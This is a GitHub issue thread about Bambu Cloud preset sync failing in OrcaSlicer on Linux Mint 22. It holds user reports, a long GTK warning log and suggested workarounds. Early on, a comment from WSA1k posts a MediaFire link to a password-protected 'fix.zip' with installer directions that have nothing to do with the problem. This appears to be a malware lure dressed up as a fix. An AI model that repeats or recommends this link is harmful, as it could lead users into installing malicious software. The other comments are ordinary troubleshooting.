OrcaSlicer/OrcaSlicer #6568: Bambu Cloud Sync does not Work on Linux Mint (Ubuntu 24.04)

EightFinger, 2024-08-26:
### Is there an existing issue for this problem?

- [X] I have searched the existing issues

### OrcaSlicer Version

2.2.0 nightly build

### Operating System (OS)

Linux

### OS Version

Ubuntu 24.04 (Linux Mint 22)

### Additional system information

CPU: Intel© Core™ i5-7200U CPU @ 2.50GHz × 2; RAM:  8GB; GPU: Intel HD 620 or NVIDIA 940MX.

### Printer

Voron Trident

### How to reproduce

1. Download OrcaSlicer 2.2.0 Nightly Build (Ubuntu Appimage)
2. Give permissions to Appimage 
3. Open OrcaSlicer
4. Install Bambu Network Plugin
5. Login with Bambu-account
6. Select yes when asking to sync existing presets.
7. No presets getting synced.

### Actual results

When doing the above steps my existing presets, which I normally use and sync on my windows machines don´t show up in OrcaSlicer on my Linux machine. I tried every nightly build of version 2.2.0. 

### Expected results

Presets should be showing up in my OrcaSlicer instance.

### Project file & Debug log uploads

[log.zip](https://github.com/user-attachments/files/16749131/log.zip)

### Checklist of files to include

- [X] Log file
- [ ] Project file

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

electricar, 2024-08-27:
I got the same issue on Linux Mint 22.

EightFinger, 2024-08-28:
How did you find out? I tried to install it, but I don´t if worked correctly.

kaihchang, 2024-09-02:
I just try to run appimage in command line, and it spits out error of a missing library?

EightFinger, 2024-09-02:
Wow thank you! 

When I do that, OrcaSlice opens just fine. 
This is my Termal output:

eightfinger@MintEdition:~/Schreibtisch$ ./OrcaSlicer.AppImage
[2024-09-02 08:40:33.289971] [0x000077d4752e13c0] [trace]   Initializing StaticPrintConfigs
add font of HarmonyOS_Sans_SC_Bold returns 1
add font of HarmonyOS_Sans_SC_Regular returns 1
add font of NanumGothic-Regular returns 1
add font of NanumGothic-Bold returns 1
loading network module at /home/eightfinger/.config/OrcaSlicer/plugins/libbambu_networking.so
after dlopen, network_module is 0x646b58172be0
[2024-09-02 08:40:34.243399 +02:00] [I] [T 3971]: TunnelMqtt::reconnect: result: 0

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.399: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.401: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.403: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.404: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.406: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.408: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.410: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.412: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.413: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.414: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.414: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.414: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.415: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.415: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.695: gtk_window_resize: assertion 'height > 0' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.704: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.704: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.705: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.705: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.706: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.706: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.706: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.706: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.725: gtk_window_resize: assertion 'height > 0' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.728: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.728: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.956: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:34.957: gtk_widget_set_size_request: assertion 'width >= -1' failed
[... 199 lines cut ...]
(orca-slicer:3951): Gtk-CRITICAL **: 08:40:36.558: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:36.560: gtk_window_resize: assertion 'height > 0' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:37.220: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:37.220: gtk_widget_set_size_request: assertion 'width >= -1' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:37.220: gtk_widget_set_size_request: assertion 'width >= -1' failed
1. lo    : 127.0.0.1
2. wlp2s0: 192.168.2.124

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.560: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.561: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.568: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.569: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.571: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.576: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

(orca-slicer:3951): Gtk-CRITICAL **: 08:40:39.577: gtk_cell_layout_get_cells: assertion 'GTK_IS_CELL_LAYOUT (cell_layout)' failed

kaihchang, 2024-09-03:
Interesting, glad it worked for you.
I'm still getting "use system SSL certificate:/etc/ssl/certs/ca-certificates.crt" error when trying to run it on Mint. For now I just run Orca on Win 11.

electricar, 2024-09-03:
For me running it via the terminal is also not working.

EightFinger, 2024-09-04:
Which version of OrcaSlicer are you using?
The one for Ubuntu or the "normal" Linux one?

electricar, 2024-09-11:
The OrcaSlicer_Linux_Ubuntu2404_V2.2.0-dev.AppImage version.
I haven't tried the current beta, but for now I have just manually exported my settings from my working Windows installation and imported them into the above version.

Nathan22211, 2024-10-12:
try the normal one. it's possible mint doesn't have some stuff from ubuntu

closed 2025-01-19 by github-actions[bot]